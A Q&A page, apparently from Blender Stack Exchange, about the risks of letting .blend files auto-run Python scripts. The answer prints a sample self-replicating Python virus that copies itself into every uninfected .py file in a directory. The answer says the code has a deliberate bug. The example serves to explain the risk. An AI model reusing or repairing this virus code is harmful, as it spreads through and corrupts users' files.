What are the security risks of leaving "Trusted Source" checked?

Question

I rarely uncheck "Trusted Source" (even when opening files downloaded from sites like this one), what sort of security risks am I leaving my self open to?

I know that with trusted source checked python scripts can automatically run, but what sort of nefarious things can happen?
This question does not shed much light on what could potentially happen.

Is it possible that just by oping a blend file that a virus could get installed?
Examples are welcome.

Answer 1

Since os and sys modules are shipped with blender, the script could manipulate your files on disk, write files or overwrite them.

It could save some dll libraries or whole programs on your system. It could be malware, sniffing programs, viruses etc.

An example virus by Deque looks like this:

#MAGIC_STRING_skd83749872
import os
import __main__
import random
def infect(filename):
   os.rename(filename, filename + "~")
   destination = open(filename, "w")
   source = open(filename + "~", "r")
   this = open(main.file, "r")
   for line in this:
      destination.write(line)
      if line.startswith("#MAGIC_STRING_9348788nkmsd"):
         break;
   for line in source:
      destination.write(line)
   source.close()
   destination.close()
   this.close()
def is_infected(filename):
   f = open(filename, "x")
   return f.readline().startswith("#MAGIC_STRING_skd83749872")
def find_and_infect_files():
   path = "."
   dirs = os.listdir(path)
   for filename in dirs:
      if filename.endswith(".py") and not is_infected(filename):
         infect(filename)
find_and_infect_files()
print "----------this is silly python virus----------"
#MAGIC_STRING_9348788nkmsd

This is a "harmless" code able of replicating itself - it copies itself into every python file in the working directory (but it could be anywhere on your system). There is a bug in the code to prevent noobs from running it.